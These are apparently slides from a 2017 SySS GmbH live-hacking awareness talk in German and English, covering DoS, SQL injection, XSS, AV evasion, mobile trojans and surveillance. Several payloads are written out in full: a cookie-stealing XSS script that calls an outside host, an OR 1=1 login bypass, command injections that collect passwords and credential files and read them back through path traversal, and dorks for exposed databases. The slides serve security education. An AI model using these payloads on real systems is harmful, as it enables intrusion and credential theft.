13.06.2017 Seite 1

SySS GmbH

Dipl.-Inform. Sebastian Schreiber

Managing Director

+49 7071 - 407856 0

Sebastian.Schreiber@SySS.de

LIVE-HACKING 16:00-17:00 UHR

13.06.2017 Seite 2

SySS GmbH

Live Hacking

1.DoS-Attacke gegen Server

2.Funktastaturen, Mäuse, Presenter

3.Angriff gegen Funk-Alarmanlagen

4.USB-Angriffe / neue Spionagewerkzeuge

5.Mobile App / Webservice hacken

6.Android Trojaner

7.Angriffe auf Antivirus

8.USB-Krypto-Angriff

9.SMS fälschen

13.06.2017 Seite 3

SySS GmbH

21.03.16

Seite 3

SySS GmbH

Die SySS GmbH 1998: Gründung der SySS GmbH

Heute: 95 Festangestellte + 2 Extern

Sitz in Tübingen, inhabergeführt

Weltweit tätig, Fokus liegt auf Deutschland

Seit Juli 2009 in eigenem Bürogebäude, ab Mai 2017 im

neuen SySS Campus.

Dienstleistungen:

Penetration Testing & Sicherheitsanalysen (95%)

Incident Response/Schulungen/Auftritte (5%)

13.06.2017 Seite 4

SySS GmbH

Bedrohungslage – Rückblick 2016

01-2016: „Cyber-Sicherheit: Die Hackerdämmerung. Ein Stromausfall in der Ukraine

könnte durch einen Cyber-Angriff ausgelöst worden sein. Es wäre das erste Mal,

dass ein Stromnetz über das Internet lahmgelegt wurde“ – Frankfurter Allgemeine

02-2016: „Ransomware-Virus legt Krankenhaus lahm: Ein Computervirus hat die IT

des Lukaskrankenhauses in Neuss infiziert“ – heise.de

04-2016: „Computervirus in bayerischem Atomkraftwerk entdeckt“ – Die Zeit

05-2016: „Cyber-Spionage-Angriff auf Ruag: Mehr als 20 Gigabyte Daten entwendet“

– Neue Zürcher Zeitung

05-2016: „Swift: Hacker attackieren schon wieder zentrales Banken-Netzwerk“ –

Süddeutsche Zeitung

10-2016: „DDoS-Attacke: Der Angriff, der aus dem Kühlschrank kam. Ein Angriff über

vernetzte Haushaltsgeräte sorgte dafür, dass Dienste wie Spotify und Netflix nicht

mehr erreichbar waren“ Die Zeit

12-2016: „Yahoo muss erneut Massenhack beichten: Eine Milliarde Opfer“ –

heise.de

13.06.2017 Seite 5

SySS GmbH

Agenda 1. DOS attack against internet web server

2. SMS (or SMTP) spoofing and identity theft

3. Attack against Canon camera

4. Attacking mobile Apps and web services (Quizzduell)

5. Attacks against krypto devices

6. Smartphone trojan / SIM bug

7. SQL Injection

8. Evading anti virus

9. USB attacks with different devices

13.06.2017 Seite 6

SySS GmbH

21.03.16

Seite 6

SySS GmbH

Referenzen

13.06.2017 Seite 7

SySS GmbH

Vorfälle in 2015

13.06.2017 Seite 8

SySS GmbH

Angriff auf TV 5 Monde

13.06.2017 Seite 9

SySS GmbH

Nur diese Fälle werden öffentlich bekannt.

Täterprofile

Know How

Neugierige Studenten

Industriespione Geheimdienste

kriminelle Energie

klassische Hacker

Script Kiddies

klassische Innentäter

kriminelle Hacker

13.06.2017 Seite 10

SySS GmbH

Google Hacking

• Filetype:sql phpmyadmin wp_users

• inurl:warenkorb inurl:preis

13.06.2017 Seite 11

SySS GmbH

LiveHack Hotel

• peter/peter

• http://www.live-hack.de/xss/xss.php

• Admin / passwort

13.06.2017 Seite 12

SySS GmbH

Google hacking

• allinurl: /hp/device/this.lcdispatcher

13.06.2017 Seite 13

SySS GmbH

SQL Injection in

Login-Formularen

•SELECT * FROM users WHERE user='peter' AND

password='peter'

peter' OR 1=1#

SELECT * FROM users WHERE user='peter' OR 1=1#' AND password='peter'

13.06.2017 Seite 14

SySS GmbH

DOS

• http://www.live-hack.de/clock.php

• Angriff: /home/livehack/thc/run.sh

13.06.2017 Seite 15

SySS GmbH

Antivirus Evasion

Funktionsweise von Antivirensoftware:

• Blacklisting

• Whitelisting

Blacklisting-Methoden: Funktionsweise und Schwächen

• signaturbasiert

• Suche nach bekannten Mustern

• unbekannte Schadsoftware kann nicht erkannt werden

• Polymorphie von Schadsoftware wird seit langem ausgenutzt, um signaturbasierte Erkennung zu umgehen

• verhaltensbasiert

• Klassifikation von Programmen in gut- oder bösartig anhand deren Verhaltens

• üblicherweise regelbasierte Techniken in Kombination mit einem Scoring-Verfahren und festgelegten Schwellenwerten für berechnete Scores (heuristisches Verfahren)

• statische Codeanalyse

• Es kann nur der Programmcode anaysiert werden, der innerhalb der ausführbaren Datei unmittelbar zugreifbar ist.

• dynamische Codeanalyse zur Laufzeit (Sanbox-Umgebung)

• diverse Einschränkungen der Sandbox-Umgebung (z. B. Zeit, bestimmte Benutzeraktionen [Mausklick, etc.])

15

13.06.2017 Seite 16

SySS GmbH

Antivirus Evasion:

Live Demonstration

• Kostenloser Schutz vor Schadsoftware für Heimanwender und

Kleinunternehmen

• Nutzt dieselbe Technologie und Scan-Engine wie System Center 2012 Endpoint Protection (früher Forefront Endpoint Protection)

Beispiel für Antivirensoftware: Microsoft Security

Essentials

• Einsatz der folgenden Antivirus-Evasion-Techniken:

• Polymorphie

• Verschlüsselung + Kompression

• Erkennung von Sandbox-Umgebungen (Sandbox Detection)

• Schadcode: Meterpreter-Shell (windows/meterpreter/reverse_https) des Metasploit Framework

Erstellen einer ausführbaren Datei mit bekanntem Schadcode unter Verwendung des

Software-Tools ShCoLo der SySS GmbH

16

13.06.2017 Seite 17

SySS GmbH

Antivirus Evasion: Testergebnisse

17

Produktname Version Datum der

Virendefinitionsda

tei

Betriebssystem(e) des

Zielsystems

Avira AntiVir Professional 10.2.0.1064 21.05.2013 Windows XP SP 3 (32 Bit)

Windows 7 SP 1 (64 Bit)

AVG Free 2013.0.2904 20.05.2013 Windows XP SP 3 (32 Bit)

Kaspersky Endpoint

Protection Workstation

8.1.0.831 21.05.2013 Windows XP SP 3 (32 Bit)

McAfee SaaS Endpoint

Protection

5400.1158 20.05.2013 Windows 7 SP 1 (64 Bit)

Microsoft Security

Essentials

4.1.522.0 21.05.2013 Windows XP SP 3 (32 Bit)

Sophos Endpoint Security

and Control

10.2 21.05.2013 Windows XP SP 3 (32 Bit)

Symantec Endpoint

Protection

12.1.1101.401 27.05.2013 Windows 7 SP 1 (64 Bit)

13.06.2017 Seite 18

SySS GmbH

Mobile phone

trojan • Symbian phone:

• 0049-177-6397937

• SMS forwarding

• activate the microphone

• Reboot

• Location info

18

13.06.2017 Seite 19

SySS GmbH

FIPS 140-2 certified crypto

USB sticks

19

13.06.2017 Seite 20

SySS GmbH

20

13.06.2017 Seite 21

SySS GmbH

XSS

• <script>window.open('http://www.syss.

de/cookie.html?'+document.cookie)</s

cript>

21

13.06.2017 Seite 22

SySS GmbH

NSA-Affäre

von 2013 •Bis 2013

•„Experten ahnen, dass E-Mails abgehört

werden“

(„Spook“ in Mailprogrammen seit 15 Jahren)

•Ab 2013 Gesichertes Wissen:

1.Telefonate werden abgehört

2.SMS/Telefonate werden abgehört

3.Die NSA beeinflusst Krypto-Standards

4.Alle Handy-Hersteller arbeiten mit der NSA

zusammen

22

13.06.2017 Seite 23

SySS GmbH

23

13.06.2017 Seite 24

SySS GmbH

24

13.06.2017 Seite 25

SySS GmbH

Zukunft?

25

13.06.2017 Seite 26

SySS GmbH

Schutz gegen PRISM,

Tempora, KeyScore

Für den Einzelnen:

• Abstinenz: Vermeidung elektronischer Kommunikation

• Bewusstsein

• Chiffrierung

• Distanzierung von amerikanischen Betriebssystemen (Android, Microsoft, Apple) und Diensten (Facebook, Gmail, iCloud)

Für uns Bürger: Neue Gesetze

• Haftung für SW-Hersteller und Cloud-Anbieter

• ADV muss auch beim Einsatz von Software gelten.

13.06.2017 Seite 27

SySS GmbH

Injections, PHP Magic Quotes

1) http://livehack.syss.de/infoboard/index.php?mod=search

2) Suche nach z.B. SySS

3) Suche nach !"§$%&/()=?`‘‚

4) Conclusio: PHP Magic Quotes

5) Suche nach SySS $(sleep 4)

6) $(grep -r -i password * > /tmp/passwd)

7) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../../../tmp/passwd

8) Suchen nach $(cat inc/userdata.inc.php | base64 > /tmp/userdata.txt)

9) http://livehack.syss.de/infoboard/index.php?mod=/infoboard/index.php?mod=../../../tmp/userdata.txt

13.06.2017 Seite 28

SySS GmbH

Quizduell

28

Gegner = lhtest2

13.06.2017 Seite 29

SySS GmbH

Eingehende Email

13.06.2017 Seite 30

SySS GmbH

13.06.2017 Seite 31

SySS GmbH

13.06.2017 Seite 32

SySS GmbH

13.06.2017 Seite 33

SySS GmbH

SySS GmbH – einige Fakten (1)

Gegründet 1998 durch Sebastian Schreiber

70 Festangestellte + 2 Externe (Stand Juli 2015)

Sitz in Tübingen

Weltweit tätig

Seit Juli 2009 in eigenem Bürogebäude

Seit Juli 2015 zugemietetes Büro

Ab Dezember 2016: Bezug zweites, neues Gebäude.

Gründung

Größe

Neckar

Weltweit

Neubau

13.06.2017 Seite 34

SySS GmbH

Recruiting

13.06.2017 Seite 35

SySS GmbH

Messen

13.06.2017 Seite 36

SySS GmbH

Firmensitz in Tübingen

13.06.2017 Seite 37

SySS GmbH

13.06.2017 Seite 38

SySS GmbH

SySS auf Konferenzen im Q4

• Hack.lu in Luxemburg

• Hacktivity in Budapest

• Handelsblatt Cyber in Berlin

• Ruxcon in Melburne

• DeepSec in Wien

• ZeroNights in Moskau

• 2017: Positive Hacking Days in Moskau

13.06.2017 Seite 39

SySS GmbH